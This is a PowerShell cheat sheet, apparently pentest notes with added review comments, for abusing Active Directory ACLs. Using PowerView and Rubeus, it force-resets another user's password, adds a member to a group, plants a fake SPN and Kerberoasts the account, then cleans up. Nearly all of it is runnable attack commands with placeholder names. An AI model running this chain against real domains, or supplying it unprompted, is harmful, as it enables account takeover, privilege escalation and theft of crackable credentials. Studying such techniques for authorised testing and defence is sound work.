Abusing ACLs

# Creating a PSCredential Object
# The operator's own password is supplied inline here; note that it therefore
# lands in PSReadLine history and in any transcript or log of this session.
$SecPassword = '<PASSWORD HERE>' | ConvertTo-SecureString -AsPlainText -Force
# Same credential object as New-Object ...PSCredential(user, secureString).
$Cred = [pscredential]::new('DOMAIN\user', $SecPassword)

# Creating a SecureString Object
# Plaintext value that becomes the target account's new password below; it has
# the same history/transcript exposure as the operator password above.
$anotheruserPassword = 'Pwn3d_by_ACLs!' | ConvertTo-SecureString -AsPlainText -Force

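# Changing the User's Password
# Relative path to PowerView; the page's '.\\' is a markdown-escaped '.\'.
Import-Module .\PowerView.ps1
# This is an administrative password RESET, not a change: the account's owner is
# locked out of it until it is reset again, and the reset is performed (and
# presumably audited on the domain controller) under $Cred's identity.
Set-DomainUserPassword -Identity anotheruser -AccountPassword $anotheruserPassword -Credential $Cred -Verbose
# NOTE(review): $Cred2 is used by every later step on this page but was never
# defined; it is presumably the credential for the account whose password was
# just set (built from the same SecureString) — confirm before relying on it.
$Cred2 = New-Object System.Management.Automation.PSCredential('DOMAIN\anotheruser', $anotheruserPassword)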

# Adding user to a Group
# Performed as $Cred2, which presumably holds write access to the group's
# membership; the placeholders 'GROUP NAME' / 'USER' are reused by the removal
# step at the end of the page.
$addMemberParams = @{
  Identity   = 'GROUP NAME'
  Members    = 'USER'
  Credential = $Cred2
  Verbose    = $true
}
Add-DomainGroupMember @addMemberParams

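# Checking if user exists in a group
# Uses the RSAT ActiveDirectory module (Get-ADGroup), not PowerView, so that
# module must be available; it runs as the session's current user (no -Credential).
# Request only the Members attribute rather than '*' — every other attribute of
# the group was being fetched just to read this one — and spell out the
# Select-Object cmdlet instead of its alias.
Get-ADGroup -Identity "GROUP NAME" -Properties Members | Select-Object -ExpandProperty Members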

# Confirming user was Added to the Group
# PowerView lookup under the session's default identity (no -Credential); the
# member added above should now appear in the MemberName column.
Get-DomainGroupMember -Identity "GROUP NAME" | Select-Object -Property MemberName

# Creating a Fake SPN
# We must be authenticated as a member of the Information Technology group for this to be successful
# Writes an arbitrary servicePrincipalName onto the target account so that a
# service ticket for it can be requested in the next step. It is a directory
# object modification made as $Cred2 (and presumably audited on the DC as such).
$spnParams = @{
  Credential = $Cred2
  Identity   = 'user'
  Set        = @{ serviceprincipalname = 'notahacker/LEGIT' }
  Verbose    = $true
}
Set-DomainObject @spnParams

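# Kerberoasting with Rubeus
# Path normalised from the page's markdown-escaped '.\\' to '.\'.
# NOTE(review): this targets 'eren' while the SPN above was written to 'user';
# both must name the same account — confirm which placeholder is intended.
# From the domain controller's point of view this is an ordinary Kerberos
# service-ticket request for the SPN just created, so it is expected to show
# up in the DC's Kerberos ticket audit log; /nowrap prints the result unwrapped.
.\Rubeus.exe kerberoast /user:eren /nowrap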

# Removing the Fake SPN from user's Account
# Reverts the servicePrincipalName write made above, again as $Cred2.
$clearSpnParams = @{
  Credential = $Cred2
  Identity   = 'user'
  Clear      = 'serviceprincipalname'
  Verbose    = $true
}
Set-DomainObject @clearSpnParams

# Removing user from the Group we added
# Reverts the Add-DomainGroupMember step; same group and member placeholders
# (the member is written 'user' here and 'USER' above — AD identities are not
# case-sensitive, but keep them consistent when filling the placeholders in).
$removeMemberParams = @{
  Identity   = 'GROUP NAME'
  Members    = 'user'
  Credential = $Cred2
  Verbose    = $true
}
Remove-DomainGroupMember @removeMemberParams
